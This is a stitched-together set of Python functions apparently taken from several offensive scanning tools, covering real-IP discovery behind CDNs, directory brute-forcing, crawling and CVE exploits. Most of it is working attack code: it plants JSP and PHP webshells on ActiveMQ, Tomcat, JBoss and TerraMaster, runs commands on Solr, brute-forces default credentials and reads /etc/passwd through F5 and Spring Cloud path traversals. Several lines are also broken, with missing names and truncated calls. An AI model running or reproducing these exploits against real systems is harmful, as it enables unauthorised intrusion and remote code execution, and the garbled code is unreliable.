def netcat(domain, ns, count): A = DNSLookup(domain, ns) ip = socket.gethostbyname(str(ns)) if count is 0 else str(A) if not A: print(que + 'Using DIG to get the real IP') print(' ' + bad + 'IP not found using DNS Lookup') url = 'http://' + domain try: page = requests.get(url, timeout=config['http_timeout_seconds']) http = 'http://' if 'http://' in page.url else 'https://' hncat = page.url.replace(http, '').split('/')[0] home = page.url.replace(http, '').split(hncat)[1] print(que + 'Connecting %s using as Host Header: %s' % (ip, domain)) data = requests.get('http://' + ip + home, headers={'host': hncat}, timeout=config['http_timeout_seconds'], allow_redirects=False) count = +1 if data.status_code in [301, 302]: print(" " + info + "Connection redirect to: %s" % data.headers['Location']) question = input(" " + info + 'Do yo want to redirect? y/n: ' ) if sys.version_info[0] == 3 else raw_input( " " + info + 'Do yo want to redirect? y/n: ') try: data = requests.get('http://' + ip + home, headers={'host': hncat}, timeout=config['http_timeout_seconds'], allow_redirects=True) except requests.exceptions.ConnectionError: if question in ['y', 'yes', 'ye']: print(" " + bad + 'Error while connecting to: %s' % data.headers['Location']) if data.status_code == 200: count = +1 sim = similarity(data.text, page.text) if sim > config['response_similarity_threshold']: print(" " + good + 'The connect has %d%% similarity to: %s' % (round(100 * sim, 2), url)) print(" " + good + '%s is the real IP' % ip) try: quest(question='\n' + info + 'IP found. Do yo want to stop tests? y/n: ', doY='sys.exit()', doN="pass") except KeyboardInterrupt: sys.exit() else: print(" " + bad + 'The connect has %d%% similarity to: %s' % (round(100 * sim, 2), url)) print(" " + bad + "%s is not the IP" % ip) except requests.exceptions.SSLError: print(" " + bad + 'Error handshaking with SSL') except requests.exceptions.ReadTimeout: print(" " + bad + "Connection Timeout to: %s" % ip) except requests.ConnectTimeout: print(" " + bad + "Connection Timeout to: %s" % ip) except requests.exceptions.ConnectionError: print(" " + bad + "Connection Timeout to: %s" % ip)
def scan(domain, host, userAgent, randomAgent, header): headers = dict(x.replace(' ', '').split(':') for x in header.split(',')) if header != None else {} headers.update({ 'User-agent': random.choice( open("data/txt/random_agents.txt").readlines()).rstrip("\n") }) if randomAgent == True else '' headers.update({'User-agent': userAgent}) if userAgent != None else '' try: print("\n" + Y + "Attempting to track real IP using: %s\n" % host) print(que + "Checking if {0} is similar to {1}".format(host, domain)) get_domain = requests.get('http://' + domain, headers=headers, timeout=config['http_timeout_seconds']) get_host = requests.get('http://' + host, headers=headers, timeout=config['http_timeout_seconds']) page_similarity = similarity(get_domain.text, get_host.text) if page_similarity > config['response_similarity_threshold']: print(tab + good + 'HTML content is %d%% structurally similar to: %s' % (round(100 * page_similarity, 2), domain)) else: print( tab + bad + 'Sorry, but HTML content is %d%% structurally similar to: %s' % (round(100 * page_similarity, 2), domain)) except Exception: print(tab + bad + 'Connection cannot be established with: %s' % (host))
def cve_2016_3088_exp(self, cmd): self.threadLock.acquire() vul_name = "Apache AcitveMQ: CVE-2016-3088" self.path = "null" = random_md5() self.webshell = "/" + + ".jsp" self.exp = self.jsp_webshell self.passlist = [ "admin:123456", "admin:admin", "admin:123123", "admin:activemq", "admin:12345678" ] try: for in self.passlist: self.base64_p = base64.b64encode(str.encode( self.p = self.base64_p.decode('utf-8') self.headers_base64 = { 'User-Agent':, 'Authorization': 'Basic ' + self.p } url = urljoin(self.url, "/admin/test/systemProperties.jsp") self.request = requests.get(url, headers=self.headers_base64, timeout=self.timeout, verify=False) if self.request.status_code == 200: self.path = \ re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>', self.request.text, re.S)[0] break self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64, data=self.exp, timeout=self.timeout, verify=False) self.headers_move = { 'User-Agent':, 'Destination': 'file://' + self.path + '/webapps/api' + self.webshell } self.request = requests.request("MOVE", self.url + "/fileserver/v.txt", headers=self.headers_move, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(self.request).decode( 'utf-8', 'ignore') self.request = requests.get(self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd, headers=self.headers_base64, timeout=self.timeout, verify=False) self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n" self.r += self.request.text verify.exploit_print(self.r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2019_0193_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami") self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2019-0193" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2019-10-16" self.vul_info["vul_vers"] = "< 8.2.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \ "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制" self.vul_info["cre_auth"] = "zhzyker" core_name = "null" md = random_md5() cmd = "echo " + md payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8')) solrhost = self.hostname + ":" + str(self.port) headers = { 'Host': "" + solrhost, 'User-Agent':, 'Accept': "application/json, text/plain, */*", 'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 'Accept-Encoding': "zip, deflate", 'Referer': self.url + "/solr/", 'Content-type': "application/x-www-form-urlencoded", 'X-Requested-With': "XMLHttpRequest", 'Connection': "close" } urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json" request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False) url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport" request =, data=payload, headers=headers, timeout=self.timeout, verify=False) if request.status_code == 200 and core_name != "null": self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def IPscan(domain, ns, A): url = 'http://' + domain if A != None: try: print(que + 'Using DIG to get the real IP') print(" " + good + 'Possible IP: %s' % str(A)) print(que + 'Retrieving target homepage at: %s' % url) try: org_response = requests.get( url, timeout=config['http_timeout_seconds']) except requests.exceptions.Timeout: sys.stderr.write(" " + bad + "%s timed out after %d seconds\n" % (url, config['http_timeout_seconds'])) except requests.exceptions.RequestException: sys.stderr.write(" " + bad + "Failed to retrieve %s\n" % url) if org_response.status_code != 200: print(' ' + bad + 'Responded with an unexpected HTTP status code') if org_response.url != url: print(' ' + good + '%s redirects to %s' % (url, org_response.url)) print(" " + good + "Request redirected successful to %s" % org_response.url) try: sec_response = requests.get( 'http://' + str(A), timeout=config['http_timeout_seconds']) if sec_response.status_code != 200: print(' ' + bad + 'Responded with an unexpected HTTP status code') else: page_similarity = similarity(sec_response.text, org_response.text) if page_similarity > config[ 'response_similarity_threshold']: print( que + 'Testing if source body is the same in both websites' ) print( ' ' + good + ' HTML content is %d%% structurally similar to: %s' % (round(100 * page_similarity, 2), org_response.url)) except Exception: print(" " + bad + "Connection Timeout") netcat(domain, ns, count=+1) return org_response except requests.exceptions.SSLError: print(" " + bad + 'Error handshaking with SSL') except requests.exceptions.ReadTimeout: print(" " + bad + "Connection Timeout") except requests.ConnectTimeout: print(" " + bad + "Connection Timeout")
def _safeRequest(self, safeURL): ''' 安全请求,用于绕过WAF等安全设备 ''' if not safeURL: return #url = random.choice(safeURL.split()) try: http.get(safeURL) except http.ConnectionError: pass
def cve_2021_27905_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF" self.vul_info["vul_numb"] = "CVE-2021-27905" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2021-04-14" self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "SSRF" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。" self.vul_info["cre_auth"] = "zhzyker" core_name = None dns = dns_request() url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \ "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns) url_ssrf = urljoin(self.url, payload) r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False) if dns in dns_result(dns): self.vul_info["vul_payd"] = url_ssrf self.vul_info["vul_data"] = dump.dump_all(r).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2019_17558_exp(self, cmd): vul_name = "Apache Solr: CVE-2019-17558" core_name = None payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd) url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except AttributeError: pass url_api = self.url + "/solr/" + str(core_name) + "/config" headers_json = { 'Content-Type': 'application/json', 'User-Agent': } set_api_data = """ { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } """ request =, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False) request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2020_5902_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "null" self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution" self.vul_info["vul_numb"] = "CVE-2020-5902" self.vul_info["vul_apps"] = "Flink" self.vul_info["vul_date"] = "2020-07-15" self.vul_info["vul_vers"] = "< 11.6.x" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "The Traffic Management User Interface (TMUI), also referred to as the " \ "Configuration utility, has a Remote Code Execution (RCE) vulnerability in " \ "undisclosed pages. (CVE-2020-5902)" self.vul_info["cre_date"] = "2021-03-20" self.vul_info["cre_auth"] = "zhzyker" url = urljoin( self.url, "/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902") try: request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) if request.status_code == 200 and r"CVE-2020-5902" in request.text: url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False) if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') self.vul_info["vul_payd"] = url self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [url:" + url + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def request(self, path): i = 0 proxy = None result = None while i <= self.maxRetries: try: if self.proxy is not None: proxy = {"https" : self.proxy, "http" : self.proxy} url = "{0}://{1}:{2}".format(self.protocol,, self.port) url = urllib.parse.urljoin(url, self.basePath) url = urllib.parse.urljoin(url, path) headers = dict(self.headers) if self.randomAgents is not None: headers["User-agent"] = random.choice(self.randomAgents) response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, headers=headers, timeout=self.timeout) result = Response(response.status_code, response.reason, response.headers, response.content) del headers break except requests.exceptions.ConnectionError as e: if self.proxy is not None: raise RequestException({'message': 'Error with the proxy: {0}'.format(e)}) continue except requests.exceptions.ReadTimeout: continue except requests.exceptions.Timeout: continue finally: i = i + 1 if i > self.maxRetries: raise RequestException({'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)}) return result
def crawlerThread(): global countVisitedUrls while visitQueue.qsize() > 0: url = visitQueue.get() try: hashData = hashUrl(url) if hashData not in visited: headers[HTTP_HEADER.USER_AGENT] = randomUserAgents() response = requests.get(url, timeout=10, headers=headers) crawlMsg = 'crawled %s depth: %d count: %d' % (url, currentDepth, countVisitedUrls) logger.log(CUSTOM_LOGGING.SYSINFO, crawlMsg) content = response.text kb.pageEncoding = response.encoding conf.cookie = str(response.cookies.get_dict()) try: lock.acquire() visited.add(hashData) countVisitedUrls += 1 fp.write(url + '\n') lock.release() except Exception, ex: logger.log(CUSTOM_LOGGING.ERROR, ex) if lock.locked(): lock.release() continue else: continue
def start(url, webapps_identify): ua = globals.get_value("UA") # 获取全局变量UA timeout = globals.get_value("TIMEOUT") # 获取全局变量UA headers = {'User-Agent': ua} try: resp = requests.get(url, headers=headers, timeout=timeout, verify=False) except: resp = "null" start = Identify(url) start.flink(webapps_identify, resp, url) start.tomcat(webapps_identify, resp, url) start.fastjson(webapps_identify, url) start.elasticsearch(webapps_identify, resp, url) start.jenkins(webapps_identify, resp, url) start.weblogic(webapps_identify, resp, url) start.spring(webapps_identify, resp, url) start.solr(webapps_identify, resp, url), resp, url) start.jboss(webapps_identify, resp, url) start.drupal(webapps_identify, resp, url) start.struts2(webapps_identify, resp, url) start.shiro(webapps_identify, resp, url) start.druid(webapps_identify, resp, url) start.eyou(webapps_identify, resp, url) start.coremail(webapps_identify, resp, url) if webapps_identify: for a in webapps_identify: print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + " "))) else: webapps_identify.append("all") print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs ")))
def spring(self, webapps_identify, resp, url): name = "Spring" time.sleep(0.1) Identify.identify_prt(name) try: if r"timestamp" in resp.text and r"status" in resp.text and r"path" in resp.text and r"message" in resp.text: webapps_identify.append("spring") elif 'WWW-Authenticate' in resp.headers: if r"Spring" in resp.headers['WWW-Authenticate'] and r"Basic" in resp.headers['WWW-Authenticate']: webapps_identify.append("spring") elif 'Www-Authenticate' in resp.headers: if r"Spring" in resp.headers['Www-Authenticate'] and r"Basic" in resp.headers['Www-Authenticate']: webapps_identify.append("spring") elif r"X-Application-Context" in resp.headers: webapps_identify.append("spring") else: r = requests.get(self.url + "/233/233/233", headers=self.headers, timeout=self.timeout, verify=False) if r"timestamp" in r.text and r"status" in r.text and r"path" in r.text and r"message" in r.text: webapps_identify.append("spring") elif 'WWW-Authenticate' in resp.headers: if r"Spring" in r.headers['WWW-Authenticate'] and r"Basic" in r.headers['WWW-Authenticate']: webapps_identify.append("spring") elif 'Www-Authenticate' in resp.headers: if r"Spring" in r.headers['Www-Authenticate'] and r"Basic" in r.headers['Www-Authenticate']: webapps_identify.append("spring") elif r"X-Application-Context" in r.headers: webapps_identify.append("spring") except: pass
def request(self, path): i = 0 proxy = None result = None while i <= self.maxRetries: try: if self.proxy is not None: proxy = {"https": self.proxy, "http": self.proxy} if self.requestByHostname: url = "{0}://{1}:{2}".format(self.protocol,, self.port) else: url = "{0}://{1}:{2}".format(self.protocol, self.ip, self.port) url = urllib.parse.urljoin(url, self.basePath) # Joining with concatenation because a urljoin bug with "::" if not url.endswith('/'): url += "/" if path.startswith('/'): path = path[1:] url += path headers = dict(self.headers) if self.randomAgents is not None: headers["User-agent"] = random.choice(self.randomAgents) headers["Host"] = # include port in Host header if it's non-standard if (self.protocol == "https" and self.port != 443) or (self.protocol == "http" and self.port != 80): headers["Host"] += ":{0}".format(self.port) response = requests.get(url, proxies=proxy, verify=False, allow_redirects=self.redirect, \ headers=headers, timeout=self.timeout) result = Response(response.status_code, response.reason, response.headers, response.content) del headers break except requests.exceptions.TooManyRedirects as e: raise RequestException( {'message': 'Too many redirects: {0}'.format(e)}) except ConnectionResetError as e: raise RequestException( {'message': 'ConnectionResetError: {0}'.format(e)}) except requests.exceptions.ConnectionError as e: if self.proxy is not None: raise RequestException( {'message': 'Error with the proxy: {0}'.format(e)}) continue except (requests.exceptions.ReadTimeout, requests.exceptions.Timeout, http.client.IncompleteRead, \ socket.timeout): continue finally: i = i + 1 if i > self.maxRetries: raise RequestException(\ {'message': 'CONNECTION TIMEOUT: There was a problem in the request to: {0}'.format(path)} ) return result
def cve_2017_12615_exp(self, cmd): vul_name = "Apache Tomcat: CVE-2017-12615" = random_md5() self.webshell = "/" + + ".jsp/" self.payload1 = self.payload2 = self.payload_cve_2017_12615 try: self.req = requests.put(self.url + self.webshell, data=self.payload2, headers=self.headers, timeout=self.timeout, verify=False) self.urlcmd = self.url + "/" + + ".jsp?pwd=password&cmd=" + cmd self.request = requests.get(self.urlcmd, headers=self.headers, timeout=self.timeout, verify=False) self.r = "Put Webshell: " + self.urlcmd + "\n-------------------------\n" + self.request.text raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') verify.exploit_print(self.r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def get_page_source_info(self, url, headers, cookies, times=0): if times < 3: try: # test proxy # proxy_switch.link_proxy(self.proxy) req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout) if req.status_code == 200: # 获取网页编码 encoding = None try: encoding = req.apparent_encoding if encoding is not None: encoding = encoding.lower() encoding = encoding if 'utf' in encoding or 'gbk' in encoding else None except Exception, e: log.output_log("".join(["[error] ", str(e)]), True) encoding = self.get_page_charset(req.content) if encoding is None else encoding req.encoding = "utf-8" if encoding is None else encoding html = req.text req.close() return [html, encoding] if req.status_code == 403: times += 1 log.output_log("[error] 403 and try to connet %d" % times, True) proxy_switch.link_proxy(self.proxy) self.get_page_source_info(url, headers, cookies, times) return None except Exception, e: log.output_log("".join(["[error] ", str(e)]), True) return None
def proxy_set(pr, pr_mode): headers = globals.get_value("HEADERS") # 获取全局变量HEADERS try: proxy_ip = str("(.*):", pr).group(1)) proxy_port = int(":(.*)", pr).group(1)) except AttributeError: print( now.timed(de=0) + color.red_warn() + " Proxy format error (e.g. --proxy-socks")) sys.exit(0) if r"socks" in pr_mode: socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port) elif r"http" in pr_mode: socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port) socket.socket = socks.socksocket try: proxy_ip_info = requests.get("", headers=headers, timeout=5) proxy_ip_info_json = json.loads(proxy_ip_info.text) proxy_ip_info_dict = "[region: " + proxy_ip_info_json[ "country_name"] + "] " + "[city: " + proxy_ip_info_json[ "city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]" except requests.exceptions.ConnectionError: proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]" except requests.exceptions.Timeout: proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]" print( now.timed(de=0) + color.yel_info() + color.yellow(" Use custom proxy: " + pr)) print( now.timed(de=0) + color.yel_info() + color.yellow(" Proxy info: " + proxy_ip_info_dict))
def cve_2020_5410_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Spring Cloud: CVE-2020-5410" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a" self.vul_info["vul_name"] = "Spring Cloud Config目录穿越漏洞" self.vul_info["vul_numb"] = "CVE-2020-5410" self.vul_info["vul_apps"] = "Spring" self.vul_info["vul_date"] = "2020-06-02" self.vul_info["vul_vers"] = "< 2.2.3, < 2.1.9" self.vul_info["vul_risk"] = "medium" self.vul_info["vul_type"] = "目录穿越漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x" \ "版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。" \ "恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。" self.vul_info["cre_date"] = "2021-01-26" self.vul_info["cre_auth"] = "zhzyker" try: request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False) if request.status_code == 200: if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def get_page_source_info(self, url, headers, cookies, times=0): if times < 3: try: # test proxy proxy_switch.link_proxy(self.proxy) req = requests.get(url, headers=headers, cookies=cookies, timeout=self.timeout) if req.status_code == 200: # 获取网页编码 encoding = None try: encoding = req.apparent_encoding if encoding is not None: encoding = encoding.lower() encoding = encoding if 'utf' in encoding or 'gbk' in encoding else None except Exception, e: log.output_log("[error] " + str(e), True) encoding = self.get_page_charset(req.content) if encoding is None else encoding req.encoding = "utf-8" if encoding is None else encoding html = req.text req.close() return [html, encoding] if req.status_code == 403: times += 1 log.output_log("[error] 403 and try to connet %d" % times, True) proxy_switch.link_proxy(self.proxy) self.get_page_source_info(url, headers, cookies, times) return None except Exception, e: log.output_log("[error] " + str(e), True) return None
def cve_2019_3799_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Spring Cloud: CVE-2019-3799" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = "/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" self.vul_info["vul_name"] = "Spring-Cloud-Config-Server Directory Traversal" self.vul_info["vul_numb"] = "CVE-2019-3799" self.vul_info["vul_apps"] = "Spring" self.vul_info["vul_date"] = "2019-04-22" self.vul_info["vul_vers"] = "2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Directory Traversal" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "由于spring-cloud-config-server模块未对传入路径进行安全限制," \ "攻击者可以利用多个..%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。" self.vul_info["cre_date"] = "2021-01-27" self.vul_info["cre_auth"] = "zhzyker" try: request = requests.get(self.url+self.vul_info["vul_payd"], headers=self.headers, timeout=self.timeout, verify=False) if r"x:0:0:root:/root:" in request.text and r"/sbin/nologin" in request.text and r"daemon" in request.text: self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[url: " + self.url + self.vul_info["vul_payd"] + " ]" verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def _matchRequests(self, fp): if not self._cmsEnhance: return ['requests', None, None] matchs = [] for line in fp: uri = self._metaInfo['target'].baseURL.rstrip("/") + line try: self._log.debug("matchRequests get {0}".format(uri)) response = http.get(uri, allow_redirects=False) except http.ConnectionError: continue else: if response.status_code == 200: if self._notFoundPattern: if self._notFoundPattern in response.content: continue else: self._log.debug("matchRequests got >>> {0}".format(uri)) matchs.append(uri) else: self._log.debug("matchRequests got >>> {0}".format(uri)) matchs.append(uri) else: continue if len(matchs) == len(fp): return ['requests', str(matchs), None] else: return ['requests', None, None]
def cve_2015_7501_exp(self, cmd): vul_name = "RedHat JBoss: CVE-2015-7501" self.path = "/invoker/JMXInvokerServlet" self.headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'User-Agent':, "Connection": "close" } try: self.req = + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=self.timeout, verify=False) time.sleep(0.5) self.cmd = urlencode({"ppp": cmd}) self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False) r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd r += "\n" r += self.request.text self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def version_check(): n = random.choice(range(10)) if n <= 1: version = globals.get_value("VULMAP") # 获取全局变量VULMAP版本号 timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT headers = globals.get_value("HEADERS") # 获取全局变量HEADERS github_ver_url = "" now_warn = now.timed(de=0) + color.red_warn() try: github_ver_request = requests.get(url=github_ver_url, headers=headers, timeout=timeout) version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>' github_ver = re.findall(version_res, github_ver_request.text, re.S | re.M)[0] if version == github_ver: print( now.timed(de=0) + color.yel_info() + color.yellow(" Currently the latest version: " + version)) elif version < github_ver: print(now_warn +" The current version is: " + version + ", Latest version: " + github_ver)) print(now_warn + " Go to github update")) else: print(now_warn +" Internal beta version: " + version)) except requests.exceptions.ConnectionError: print(now_warn +" The current version is: " + version + ", Version check failed")) except requests.exceptions.Timeout: print(now_warn +" The current version is: " + version + ", Version check failed"))
def getshell(self, url): ''' TerraMaster 文件上传GetShell函数 :param url: TerraMaster url地址 :return: 返回得到的shell地址 ''' exp_url = url + 'include/upload.php?targetDir=../cgi-bin/filemanage/' headers = { 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +' } filename = 'safe.php' with open(filename, 'wb') as fp: fp.write('<?php @eval($_POST[mosin]);?>') files = { 'Filename': (None, filename), 'name': (None, filename), 'chunk': (None, '0'), 'chunks': (None, '1'), 'file': (filename, open(filename, 'rb'), 'application/octet-stream'), 'Upload': (None, '给老子上!') } try:, files=files, headers=headers) shell = url + 'cgi-bin/filemanage/' + filename reqcode = requests.get(shell, headers=headers).status_code except Exception, msg: print '\n[x] ERROR!!!:', msg
def crawl(url, currentDepth, countUrls): redisCon = Redis(host=conf.REDIS_HOST, port=conf.REDIS_PORT, password=conf.REDIS_PASSWD) try: headers = dict() headers[HTTP_HEADER.USER_AGENT] = randomUserAgents() response = requests.get(url, timeout=10, headers=headers) # crawlMsg = 'crawled %s depth: %d count: %d' % (url, currentDepth, countVisitedUrls) # logger.log(CUSTOM_LOGGING.SYSINFO, crawlMsg) content = response.text kb.pageEncoding = response.encoding conf.cookie = str(response.cookies.get_dict()) hashData = hashUrl(url) redisCon.sadd('visited', hashData) redisCon.lpush('visitedList', url) getDB().insert({'url':url, 'depth': currentDepth, 'count':countUrls}) except Exception, ex: logger.log(CUSTOM_LOGGING.ERROR, ex) # print traceback.print_exc() return
